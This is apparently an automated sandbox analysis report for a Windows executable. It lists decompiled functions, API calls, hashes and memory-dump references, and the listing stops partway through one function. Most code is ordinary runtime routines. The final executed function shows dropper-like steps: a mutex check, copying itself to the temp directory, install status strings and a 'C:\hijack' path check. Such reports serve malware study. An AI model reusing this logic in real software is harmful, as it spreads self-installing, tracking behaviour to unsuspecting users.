                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00000102,?), ref: 00402B97
                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 00402BBB
                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 00402BDE
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402BEB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreateOpenValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 776291540-0
                                                                                                                                                      • Opcode ID: e67dd30e4998f12c05531f5aa9724ed1f1c816c8c9d0428bf3833eaab55c34ae
                                                                                                                                                      • Instruction ID: ad08d0a4e727adc7a06136ec506084d49ae250f6fb43ebd82b7ce4284d3e4376
                                                                                                                                                      • Opcode Fuzzy Hash: e67dd30e4998f12c05531f5aa9724ed1f1c816c8c9d0428bf3833eaab55c34ae
                                                                                                                                                      • Instruction Fuzzy Hash: 17013171354311BBF2208B60DD0AF7B77A8EB84B50F10881CBB54BA2D4D6B0E840C6AD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000CA30, Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 39%
                                                                                                                                                      			E1000CA30(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x103301c0);
				_t8 = E10010534(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10010579(_t8);
				}
				if( *0x10335f3c != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x10333310, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E1000F720(_t31);
						 *_t10 = E1000F6E5(GetLastError());
					}
					goto L9;
				}
				L1000FA03(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1000FA7C(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1000FAA7();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1000CA86();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                                                                                                                                      0x1000ca30
                                                                                                                                                      0x1000ca32
                                                                                                                                                      0x1000ca37
                                                                                                                                                      0x1000ca3c
                                                                                                                                                      0x1000ca41
                                                                                                                                                      0x1000cab8
                                                                                                                                                      0x1000cabd
                                                                                                                                                      0x1000cabd
                                                                                                                                                      0x1000ca4a
                                                                                                                                                      0x1000ca8f
                                                                                                                                                      0x1000ca90
                                                                                                                                                      0x1000ca98
                                                                                                                                                      0x1000ca9e
                                                                                                                                                      0x1000caa0
                                                                                                                                                      0x1000caa2
                                                                                                                                                      0x1000cab5
                                                                                                                                                      0x1000cab7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000caa0
                                                                                                                                                      0x1000ca4e
                                                                                                                                                      0x1000ca54
                                                                                                                                                      0x1000ca59
                                                                                                                                                      0x1000ca5f
                                                                                                                                                      0x1000ca64
                                                                                                                                                      0x1000ca66
                                                                                                                                                      0x1000ca67
                                                                                                                                                      0x1000ca68
                                                                                                                                                      0x1000ca6e
                                                                                                                                                      0x1000ca6f
                                                                                                                                                      0x1000ca76
                                                                                                                                                      0x1000ca7f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ca81
                                                                                                                                                      0x1000ca81
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ca81

                                                                                                                                                      APIs
                                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2661975262-0
                                                                                                                                                      • Opcode ID: d759168b4be4b4469117ee5877101e11671dc200a8624a95c389703c63f9e0ca
                                                                                                                                                      • Instruction ID: 10b30a0b1b21ab9b25203a3b4f1cd3614836a259c78c12a13bfb3de2cf880016
                                                                                                                                                      • Opcode Fuzzy Hash: d759168b4be4b4469117ee5877101e11671dc200a8624a95c389703c63f9e0ca
                                                                                                                                                      • Instruction Fuzzy Hash: 94016775B0131A9AFB10DBB49C46B5E76A4DF013E5F104109F5049A0D5CF38A940DF56
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001F570, Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E1001F570() {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				struct _SYSTEMTIME _v52;
				struct _FILETIME _v60;
				intOrPtr _t31;

				_v28.wYear = 0x7b2;
				_v28.wMonth = 1;
				_v28.wDay = 1;
				_v28.wHour = 0;
				_v28.wMinute = 0;
				_v28.wSecond = 0;
				_v28.wMilliseconds = 0;
				GetSystemTime( &_v52);
				SystemTimeToFileTime( &_v52,  &_v12);
				SystemTimeToFileTime( &_v28,  &_v60);
				_t31 = _v12.dwLowDateTime - _v60.dwLowDateTime;
				asm("sbb eax, [ebp-0x34]");
				_v36 = E1000F290(_t31, _v12.dwHighDateTime, 0x2710, 0);
				_v32 = _t31;
				return _v36;
			}










                                                                                                                                                      0x1001f576
                                                                                                                                                      0x1001f57c
                                                                                                                                                      0x1001f582
                                                                                                                                                      0x1001f588
                                                                                                                                                      0x1001f58e
                                                                                                                                                      0x1001f594
                                                                                                                                                      0x1001f59a
                                                                                                                                                      0x1001f5a4
                                                                                                                                                      0x1001f5b2
                                                                                                                                                      0x1001f5c0
                                                                                                                                                      0x1001f5c9
                                                                                                                                                      0x1001f5cf
                                                                                                                                                      0x1001f5e0
                                                                                                                                                      0x1001f5e3
                                                                                                                                                      0x1001f5ef

                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemTime.KERNEL32(?), ref: 1001F5A4
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 1001F5B2
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F5C0
                                                                                                                                                      • __aulldiv.LIBCMT ref: 1001F5DB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$System$File$__aulldiv
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3735792614-0
                                                                                                                                                      • Opcode ID: c5081578e9fd931923cb91727b204842aed61b67563f5adf44f10d167ea8ffdf
                                                                                                                                                      • Instruction ID: fa02b7a9fed9572687d28a8f87146f07c02dbb090ec293c5d85fe2b1344f7672
                                                                                                                                                      • Opcode Fuzzy Hash: c5081578e9fd931923cb91727b204842aed61b67563f5adf44f10d167ea8ffdf
                                                                                                                                                      • Instruction Fuzzy Hash: 9301E575D1021DAADB00DFE4C8899EEB7B8FF04304F109649E904A7250E779A64ACBA9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00402B10, Relevance: 6.0, APIs: 4, Instructions: 38registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00402B10(void* _a4, char* _a8, char _a12) {
				long _t13;
				char* _t23;

				_t23 = _a4;
				if(RegOpenKeyA(0x80000002, _t23,  &_a4) == 0 || RegCreateKeyA(0x80000002, _t23,  &_a4) == 0) {
					_t13 = RegSetValueExA(_a4, _a8, 0, 4,  &_a12, 4);
					RegCloseKey(_a4);
					return 0 | _t13 == 0x00000000;
				} else {
					return 0;
				}
			}





                                                                                                                                                      0x00402b11
                                                                                                                                                      0x00402b28
                                                                                                                                                      0x00402b58
                                                                                                                                                      0x00402b65
                                                                                                                                                      0x00402b73
                                                                                                                                                      0x00402b3f
                                                                                                                                                      0x00402b42
                                                                                                                                                      0x00402b42

                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00402B20
                                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 00402B35
                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 00402B58
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402B65
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreateOpenValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 776291540-0
                                                                                                                                                      • Opcode ID: 4fffc15b6b3d582784c294c3cc734a10fac99c4c80815db6eb7a54933496e82f
                                                                                                                                                      • Instruction ID: d245c1feb1c9cef44fd5f91d5bae3c9617faa7c0462537c3c4e14eb803ddf16c
                                                                                                                                                      • Opcode Fuzzy Hash: 4fffc15b6b3d582784c294c3cc734a10fac99c4c80815db6eb7a54933496e82f
                                                                                                                                                      • Instruction Fuzzy Hash: 10F09671114312BFE624CF20DD48FAB7BE8EF84754F04881CBA44E22A0D770EC40C6A9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00408A8A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                      			E00408A8A(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x410af8,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E004090EB(1,  &_v280, 0x100,  &_v1304,  *0x410af8,  *0x410d24, 0);
						E004081AA( *0x410d24, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x410af8, 0);
						E004081AA( *0x410d24, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x410af8, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x410b20) =  *(_t55 + 0x410b20) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x410c21) =  *(_t55 + 0x410c21) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x410b20) = _t77;
								goto L16;
							}
							 *(_t55 + 0x410c21) =  *(_t55 + 0x410c21) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x410b20) =  *(_t43 + 0x410b20) & 0x00000000;
						} else {
							 *(_t43 + 0x410c21) =  *(_t43 + 0x410c21) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x410c21) =  *(_t43 + 0x410c21) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x410b20) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}


























                                                                                                                                                      0x00408aa7
                                                                                                                                                      0x00408aad
                                                                                                                                                      0x00408ab4
                                                                                                                                                      0x00408ab4
                                                                                                                                                      0x00408abb
                                                                                                                                                      0x00408abc
                                                                                                                                                      0x00408ac0
                                                                                                                                                      0x00408ac3
                                                                                                                                                      0x00408acc
                                                                                                                                                      0x00408b05
                                                                                                                                                      0x00408b24
                                                                                                                                                      0x00408b48
                                                                                                                                                      0x00408b70
                                                                                                                                                      0x00408b78
                                                                                                                                                      0x00408b7a
                                                                                                                                                      0x00408b80
                                                                                                                                                      0x00408b80
                                                                                                                                                      0x00408b86
                                                                                                                                                      0x00408ba1
                                                                                                                                                      0x00408bb3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408bb3
                                                                                                                                                      0x00408ba3
                                                                                                                                                      0x00408baa
                                                                                                                                                      0x00408b96
                                                                                                                                                      0x00408b96
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408b96
                                                                                                                                                      0x00408b88
                                                                                                                                                      0x00408b8f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408bba
                                                                                                                                                      0x00408bba
                                                                                                                                                      0x00408bbc
                                                                                                                                                      0x00408bbd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408b80
                                                                                                                                                      0x00408ad0
                                                                                                                                                      0x00408ad3
                                                                                                                                                      0x00408ad3
                                                                                                                                                      0x00408ad6
                                                                                                                                                      0x00408adb
                                                                                                                                                      0x00408adf
                                                                                                                                                      0x00408ae6
                                                                                                                                                      0x00408aee
                                                                                                                                                      0x00408af8
                                                                                                                                                      0x00408af8
                                                                                                                                                      0x00408af8
                                                                                                                                                      0x00408afb
                                                                                                                                                      0x00408afc
                                                                                                                                                      0x00408aff
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408b04
                                                                                                                                                      0x00408bc3
                                                                                                                                                      0x00408bca
                                                                                                                                                      0x00408bcd
                                                                                                                                                      0x00408beb
                                                                                                                                                      0x00408c00
                                                                                                                                                      0x00408bf2
                                                                                                                                                      0x00408bf2
                                                                                                                                                      0x00408bfb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00408bfb
                                                                                                                                                      0x00408bd4
                                                                                                                                                      0x00408bd4
                                                                                                                                                      0x00408bdd
                                                                                                                                                      0x00408be0
                                                                                                                                                      0x00408be0
                                                                                                                                                      0x00408be0
                                                                                                                                                      0x00408c07
                                                                                                                                                      0x00408c08
                                                                                                                                                      0x00408c0e

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Info
                                                                                                                                                      • String ID: $
                                                                                                                                                      • API String ID: 1807457897-3032137957
                                                                                                                                                      • Opcode ID: e9bc240eaf728152c3c56a4c4f05592c4888a033a2c4116666d2d63552bb07be
                                                                                                                                                      • Instruction ID: ddf649e54e9f03be24ddff7d6348d85147b2ca67cb3d7c0e4ae33ec857c9a532
                                                                                                                                                      • Opcode Fuzzy Hash: e9bc240eaf728152c3c56a4c4f05592c4888a033a2c4116666d2d63552bb07be
                                                                                                                                                      • Instruction Fuzzy Hash: 17418A310082585EEB158754CE59BEB3FF99B05304F0404FAE5C5EA1D3CAB85984CBAE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100026D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E100026D0(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v56;
				char _v84;
				void* _t14;
				intOrPtr _t20;

				_push(0xffffffff);
				_push(E10022D98);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t20;
				E10001160( &_v84, __eflags, "vector<T> too long");
				_v8 = 0;
				E10001E70( &_v56,  &_v84);
				E1000EBEB( &_v56, 0x103307a8);
				_v8 = 0xffffffff;
				_t14 = E100011A0( &_v84);
				 *[fs:0x0] = _v16;
				return _t14;
			}









                                                                                                                                                      0x100026d3
                                                                                                                                                      0x100026d5
                                                                                                                                                      0x100026e0
                                                                                                                                                      0x100026e1
                                                                                                                                                      0x100026f3
                                                                                                                                                      0x100026f8
                                                                                                                                                      0x10002706
                                                                                                                                                      0x10002714
                                                                                                                                                      0x10002719
                                                                                                                                                      0x10002723
                                                                                                                                                      0x1000272b
                                                                                                                                                      0x10002735

                                                                                                                                                      APIs
                                                                                                                                                      • std::bad_exception::bad_exception.LIBCMTD ref: 10002706
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10002714
                                                                                                                                                        • Part of subcall function 1000EBEB: RaiseException.KERNEL32(?,?,1000CC92,100019C3,?,?,?,?,1000CC92,100019C3,10330750,103332E0), ref: 1000EC2B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
                                                                                                                                                      • String ID: vector<T> too long
                                                                                                                                                      • API String ID: 1843230569-3788999226
                                                                                                                                                      • Opcode ID: d6cada7001f69a800286162e9fcab198a3ba3934b13d850f72d45b17b4c01992
                                                                                                                                                      • Instruction ID: 1a2e96a28b8215f22a0e790cb2dc9ca4275ca3d727c061adff09d24352fe5d00
                                                                                                                                                      • Opcode Fuzzy Hash: d6cada7001f69a800286162e9fcab198a3ba3934b13d850f72d45b17b4c01992
                                                                                                                                                      • Instruction Fuzzy Hash: 31F05876804548EBDB14DBD4DD81BEEB778FB047A0F900728F522676C4DB342A05CB80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000442C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                      			E1000442C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t20;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = __eflags;
				_push(0x44);
				E1000F00B(E10022968, __ebx, __edi, __esi);
				E10001160(_t25 - 0x28, _t27, "invalid string position");
				_t2 = _t25 - 4;
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t20 = _t25 - 0x50;
				E10001D90(_t20,  *_t2, _t25 - 0x28);
				 *((intOrPtr*)(_t25 - 0x50)) = 0x100232c8;
				E1000EBEB(_t25 - 0x50, 0x10330158);
				asm("int3");
				_push(__esi);
				_t23 = _t20;
				E10001EF0(_t20,  *((intOrPtr*)(_t26 + 8)));
				 *_t23 = 0x100232c8;
				return _t23;
			}








                                                                                                                                                      0x1000442c
                                                                                                                                                      0x1000442c
                                                                                                                                                      0x10004433
                                                                                                                                                      0x10004440
                                                                                                                                                      0x10004445
                                                                                                                                                      0x10004445
                                                                                                                                                      0x1000444d
                                                                                                                                                      0x10004450
                                                                                                                                                      0x1000445e
                                                                                                                                                      0x10004465
                                                                                                                                                      0x1000446a
                                                                                                                                                      0x1000446b
                                                                                                                                                      0x10004470
                                                                                                                                                      0x10004472
                                                                                                                                                      0x10004477
                                                                                                                                                      0x10004480

                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 10004433
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10004465
                                                                                                                                                        • Part of subcall function 1000EBEB: RaiseException.KERNEL32(?,?,1000CC92,100019C3,?,?,?,?,1000CC92,100019C3,10330750,103332E0), ref: 1000EC2B
                                                                                                                                                        • Part of subcall function 10001EF0: std::exception::exception.LIBCMT ref: 10001F13
                                                                                                                                                      Strings
                                                                                                                                                      • invalid string position, xrefs: 10004438
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
                                                                                                                                                      • String ID: invalid string position
                                                                                                                                                      • API String ID: 2977319401-1799206989
                                                                                                                                                      • Opcode ID: 8c5585535794f9a1e6dadcd63e0675b21dc6b9f2d0e27e7cb116dd0b948fe66e
                                                                                                                                                      • Instruction ID: a56476a32a0c337bfade56aca9773eeef8d3bbd0f37adf4676240551fddf05bf
                                                                                                                                                      • Opcode Fuzzy Hash: 8c5585535794f9a1e6dadcd63e0675b21dc6b9f2d0e27e7cb116dd0b948fe66e
                                                                                                                                                      • Instruction Fuzzy Hash: 6CE09275800198EBD710DBD4EC41ADEB778EF04390F80881AF605BB20ACBB5A948CB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Analysis Process: 56BB1610C0318054.exe PID: 476 Parent PID: 1676 56BB1610C0318054.exeCOMMON

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 100204C0, Relevance: 40.4, APIs: 10, Strings: 13, Instructions: 176COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                      			E100204C0(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				long _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				void* __esi;
				void* _t46;
				int _t47;
				void* _t56;
				void* _t57;
				intOrPtr _t73;
				int _t75;
				int _t77;
				void* _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t109;
				void* _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t120;
				void* _t125;

				_t125 = __eflags;
				_t100 = __edi;
				_t82 = __ebx;
				_push(0xffffffff);
				_push(E10022D01);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t104;
				_push(_t101);
				E1001FD60();
				_v312 = 0;
				E1000CF20(__edi,  &_v311, 0, 0x103);
				GetModuleFileNameA(0,  &_v312, 0x104);
				E1001A600(__ebx, _t100, _t101, _t125,  &_v44); // executed
				_v8 = 0;
				_t46 = E10001A50( &_v312, E100011E0( &_v44));
				_t108 = _t104 - 0x264 + 0x18;
				_t126 = _t46;
				if(_t46 == 0) {
					_t47 = E1001A0F0("Global\\exist_sign__install_r3");
					_t109 = _t108 + 4;
					__eflags = _t47;
					if(_t47 == 0) {
						_v576 = 0;
						E1000CF20(_t100,  &_v575, 0, 0x103);
						GetTempPathA(0x104,  &_v576);
						E1000CD96( &_v576,  &_v576, 0x104, E100011E0( &_v44));
						_t111 = _t109 + 0x18;
						CopyFileA( &_v312,  &_v576, 0);
						_v580 = GetTickCount();
						while(1) {
							_t56 = E1001A170( &_v312);
							_t102 = _t56;
							_t57 = E1001A170( &_v576);
							_t111 = _t111 + 8;
							__eflags = _t56 - _t57;
							if(__eflags == 0) {
								break;
							}
							Sleep(0x3e8);
							__eflags = GetTickCount() - _v580 - 0x7530;
							if(__eflags <= 0) {
								continue;
							} else {
							}
							break;
						}
						E1001FDB0();
						E1001FF90(_t82, _t100, _t102, __eflags, "install", "user01", "-0.25", "45.0.0", "exe");
						_t114 = _t111 + 0x14 - 0x1c;
						_t89 = _t114;
						_v588 = _t114;
						_v612 = E10001160(_t114, __eflags, "status=main_start");
						E10020180(_t82, _t100, _t102, __eflags);
						_t115 = _t114 + 0x1c;
						__eflags = PathFileExistsA("C:\\hijack");
